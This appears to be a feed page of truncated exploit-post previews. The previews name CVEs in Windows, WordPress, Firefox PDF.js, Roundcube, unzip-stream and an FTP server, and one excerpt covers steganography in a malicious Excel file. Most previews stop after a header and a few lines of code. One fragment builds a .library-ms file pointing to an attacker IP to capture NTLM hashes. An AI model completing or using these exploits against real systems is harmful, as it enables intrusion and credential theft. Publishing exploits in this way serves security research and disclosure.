# Exploit Title: Microsoft Windows 11 – Kernel Privilege Escalation # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win, Ubuntu # CVE : CVE-2024-21338 #include “pch.hpp” #include “poc.hpp” // This function is used to set the IOCTL buffer depending on the…
# Exploit Title: WordPress Core 6.2 – Directory Traversal # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Version: = 6.2 # Tested on: Win, Ubuntu # CVE : CVE-2023-2745 import requests from colorama import init, Fore, Style init(autoreset=True) url = input(“E.G https://example.com/wp-login.php : “) …
I spotted another interesting file that uses, once again, steganography. It seems to be a trend (see one of my previous diaries[1]). The file is an malicious Excel sheet called blcopy.xls. Office documents are rare these days because Microsoft improved the rules to allow automatic macro execution[2]. But it does not mean that Office documents…
# Exploit Title: Firefox ESR 115.11 – Arbitrary JavaScript execution in PDF.js # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://wordpress.org # Version: = 115.11 # Tested on: Win, Ubuntu # CVE : CVE-2024-4367 #!/usr/bin/env python3 import sys def…
import os import tarfile def main(): file_name = input(“Enter your file name: “) ip_address = input(“Enter IP (EX: 192.168.1.162): “) library_content = f””” \\\\{ip_address}\\IT “”” library_file_name = f”{file_name}.library-ms” with open(library_file_name, “w”, encoding=”utf-8″) as f: f.write(library_content) tar_name = “exploit.tar” with tarfile.open(tar_name, “w”) as tarf: …
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization’, ‘Description’ => %q{ Roundcube Webmail before 1.5.10…
# Exploit Title: Freefloat FTP Server 1.0 – Remote Buffer Overflow # Date: 22 may 2025 # Notification vendor: No reported # Discovery by: Fernando Mengali # LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/ # Version: 1.0 # Tested on: Windows XP SP3 English – # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3) # Vulnerability Type: Remote Buffer Overflow …
# Exploit Title: Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # CVE: CVE-2024-49138 #include #include #include #include #include #include #include #include #include #include…
# Exploit Title: unzip-stream 0.3.1 – Arbitrary File Write # Date: 18th April, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/mhr3/unzip-stream # Version: unzip-stream 0.3.1 # Tested on: Ubuntu # CVE: CVE-2024-42471 # NB: Python’s built-in `zipfile` module has limitations on the `arcname` parameter. # To bypass…
# Exploit title: Microsoft – NTLM Hash Disclosure Spoofing (library-ms) # Exploit Author: John Page (aka hyp3rlinx) # x.com/hyp3rlinx # ISR: ApparitionSec Back in 2018, I reported a “.library-ms” File NTLM information disclosure vulnerability to MSRC and was told “it was not severe enough”, that being said I post it anyways. Seven years passed,…
